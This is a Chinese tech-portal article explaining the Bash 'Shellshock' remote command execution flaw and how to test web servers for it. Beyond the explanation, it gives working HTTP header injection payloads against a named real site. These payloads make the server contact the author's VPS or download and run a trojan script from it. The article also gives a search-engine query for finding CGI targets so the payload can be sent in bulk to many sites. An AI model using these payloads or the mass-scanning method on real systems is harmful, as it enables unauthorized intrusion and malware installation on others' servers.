51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

Bash远程解析命令执行漏洞测试方法

作者:wivndf
安全 漏洞
Bash漏洞与“心脏出血”漏洞不同,“心脏出血”只能借助窃取用户电脑信息,而bash 漏洞允许黑客远程控制电脑,拿到系统最高权限!其方法利用就更简单了——复制/粘贴一行命令代码即可!

从昨天开始,这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf,大家都在谈论,“互联网的心脏又出血了”,可是,亲,到底怎么对网站进行测试?下面这段脚本

$ env x=‘() { :;}; echo vulnerable' bash -c "echo this is a test"

真的如各路大神们说的这样吗?

它与“心脏出血”漏洞不同,“心脏出血”只能借助窃取用户电脑信息,而bash 漏洞允许黑客远程控制电脑,拿到系统最高权限!其方法利用就更简单了——复制/粘贴一行命令代码即可!

Bash漏洞为什么能够执行

Bash漏洞的原理:

BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。

此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令。

简单地说就是,Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令。

Bash漏洞与远程执行有啥联系

看到上面的解释,很多童鞋都理解成了本地的漏洞,然后很多人又觉得,本地有啥可以利用的,于是就忽略了这个神级漏洞的存在。我想说的是,这个漏洞,利用热度可以媲美当年的MS08-067,威力虽然弱了点,但远程控制电脑还是可以的。

首先解释一下cgi脚本。很多网站类似下面的链接:

GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

后台不仅仅用python、Perl来解释执行并反馈给客户端Response,当然还可以换做bash脚本来解释执行提交上来的GET/POST请求。所以,理论上,你在HTTP请求中插入一个Bash命令,比如

() { :;}; wget http://www.myvps.org/testvul.sh

如果服务器的Bash解释器具有这个漏洞,那么在解释上面这这句话的时候就会执行wget请求,将一个恶意的testvul.sh文件下载到这个服务器,那为何说要放在HTTP头部呢?比如:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

这是因为这个漏洞是bash解释器在解释某些特殊的变量时才可以触发的:

在于BASH处理以“(){”开头的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令

通过自定义这些参数的值为“函数环境变量”的形式,就可以触发后面的命令,恶意的客户仅需要发送特殊构造的HTTP请求就可以使服务器执行特定的命令(命令的权限和解释HTTP请求的Bash脚本环境相同)。

实际测试中,我的构造的测试请求:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

过程是这样的:

我发送GET请求–>目标服务器cgi路径

目标服务器解析这个get请求,碰到UserAgent后面的参数,Bash解释器就执行了后面的命令

目标服务器wget–>我的myvps.org

我的vps记录下这个访问的IP地址

然后查看我的myvps.org服务器的访问记录,就可以确定目标有没有去访问,如果访问了,那么,很好,它是有漏洞的。下面是我的VPS接收到的wget请求访问的日志:

Bash远程解析命令执行漏洞测试方法 

#p#

 

大神是这样测试漏洞的

当然,你也可以这样构造:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

实际上执行了下面三句:

/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh

你会发现,你的木马就这么脚本了,这就是Bash漏洞利用的精髓。

当然,你可以利用批量Google搜索:

filetype:cgi inurl:cgi-bin site:jp

然后批量提交类似的GET请求,你就能做到批量测试了。测试表明,500个url里有6-8个有bash漏洞

责任编辑:蓝雨泪 来源: FreeBuf
Bash漏洞Bash漏洞
相关推荐
对EXE文件解析远程代码执行漏洞的介绍
本文主要向大家描述的是EXE文件解析远程代码执行漏洞的实际操作,同时本文也有对受影响系统的相关内容的简单描述。

2010-09-13 17:57:12

执行漏洞
EXE文件解析远程代码执行漏洞精简版
下面的文章主要介绍的是EXE文件解析远程的代码执行漏洞,如果你对这一技术,心存好奇的话,你就可以浏览以下的文章了。

2010-09-17 16:01:55

代码执行漏洞EXE文件
QNAP修复了关键的QVR远程命令执行漏洞
根据QNAP发布的公告,该漏洞会影响运行QVR的QNAPVS系列NVR。如果被利用,此漏洞允许远程攻击者运行任意命令。

2022-05-07 11:31:25

漏洞网络攻击
使用NetCat或BASH创建反向Shell来执行远程Root命令
反向shell(Reverseshell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。本文中详解了使用NetCat或BASH创建反向Shell来执行远程Root命令的方法。

2013-12-20 10:20:34

GitLab未授权访问漏洞可导致远程命令执行
GitLab是一个利用RubyonRails开发的开源应用程序,实现一个自托管的Git项目仓库,可通过Web界面进行访问公开的或者私人项目。2016年11月3日,美国众测平台HackerOne公布了GitLab的目录遍历漏洞。漏洞的发现者为JobertAbma,同时表示该漏洞可导致远程命令执行。

2016-11-08 19:56:09

GitLab漏洞远程命令
Zend Framework远程执行代码漏洞
本周bleepingcomputer揭露了一个不受信任的反序列化漏洞,攻击者可以利用ZendFramework在PHP站点上实现远程代码执行。

2021-01-26 10:00:45

漏洞网络安全网络攻击
ElasticSearch远程代码执行漏洞告警
ElasticSearch爆出严重安全漏洞(CVE20151427),该漏洞可造成远程代码执行,攻击者可直接获取系统权限,危害较大,请广大用户注意。

2015-03-06 15:31:01

ImageMagick远程执行漏洞分析及利用
ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。

2016-09-29 14:37:39

ImageMagick漏洞分析
漏洞预警!Apache Struts 2曝出远程代码执行漏洞
该漏洞被追踪为CVE202350164,其根源在于文件上传逻辑,该逻辑可实现未经授权的路径遍历,在这种情况下极易被用来上传恶意文件并执行任意代码。

2023-12-14 16:20:09

Windows用户仍需警惕远程代码执行漏洞
在其最新的年度安全报告中,微软声称屏蔽远程代码执行漏洞的工作已经取得阶段性进展。然而于本周一公布的报告最初版本证实内容有误。在2010财年中,微软产品总计爆出211项安全漏洞,分88条公告加以通知。根据微软给出的百分比结果显示,这些漏洞中有149项能够被远程代码执行所利用。而到了2011年,这一数字跃升为约178项。

2011-08-04 13:53:04

APACHE OFBIZ XMLRPC远程代码执行漏洞分析
近期,研究人员报告了一个存在于ApacheOFBiz中的反序列化漏洞。这个漏洞是由多个Java反序列化问题所导致的,当代码在处理发送至webtoolscontrolxmlrpc的请求时,便有可能触发该漏洞。未经认证的远程攻击者将能够通过发送精心构造的恶意请求来触发并利用该漏洞,并实现任意代码执行。

2020-10-08 13:44:27

漏洞
预警:微软有高危远程代码执行漏洞
据绿盟科技、360等厂商刚刚发布的漏洞预警称,微软发布的5月份月度更新中修复了一个存在于远程桌面服务中(RemoteDesktopServices)的高危远程代码执行漏洞(CVE20190708),RDP协议本身不受影响。该漏洞可以被蠕虫病毒利用,建议受影响用户尽快下载补丁升级进行防护。

2019-05-15 15:20:01

微软漏洞防护
OrientDB远程代码执行漏洞利用与分析
OrientDB数据库是一个支持分布式的NoSQL数据库,主要针对文档以及图形等进行检索,通过研究发现其默认配置admin、reader和writer三个角色,在处理where”或“fetchplan”或“orderby”函数时,由于在OrientDB中有一个执行groovy函数,groovy包装类没有沙箱,暴露了系统函数,因此我们可以运行我们想要的任何命令。该漏洞在国外被命名为CVE201711467,本文...

2017-08-22 13:45:27

PayPal曝远程代码执行漏洞(含视频)
日前知名在线支付公司PayPal被曝存在严重的远程代码执行漏洞,攻击者可以利用该漏洞在PayPal的web应用服务器上执行恶意命令,最终获得服务器控制权限。

2015-04-30 08:11:40

Apache警告:Tomcat存在远程代码执行漏洞
MarkThomas,一位长期致力于Apache+Tomcat的工作者称“在某种情况下,用户可以上传恶意JSP文件到Tomcat服务器上运行,然后执行命令。JSP的后门可以用来在服务器上任意执行命令。”

2014-09-12 17:47:36

小米手机MIUI远程代码执行漏洞分析
7月笔者在研究webview漏洞时专门挑小米手机的MIUI测试了下,发现了非常明显的安全漏洞。通过该漏洞可以远程获取本地APP的权限,突破本地漏洞和远程漏洞的界限,使本地app的漏洞远程也能被利用,达到隔山打牛的效果。

2014-08-27 16:22:19

【重大漏洞预警】Windows两个关键远程代码执行漏洞
微软6月补丁日披露两个正在被利用的远程代码执行漏洞(CVE20178543)WindowsSearch远程代码执行漏洞和(CVE20178464)LNK文件(快捷方式)远程代码执行漏洞。

2017-06-15 17:28:36

【重大漏洞预警】Windows两个关键远程代码执行漏洞
微软6月补丁日披露两个正在被利用的远程代码执行漏洞(CVE20178543)WindowsSearch远程代码执行漏洞和(CVE20178464)LNK文件(快捷方式)远程代码执行漏洞。

2017-06-14 10:02:22

BASH漏洞初挖掘
BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。

2014-09-25 19:30:51

思科终于发布补丁修复远程代码执行漏洞
思科终于发布补丁,修复已有三年历史的远程代码执行漏洞。

2014-10-29 15:44:55

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服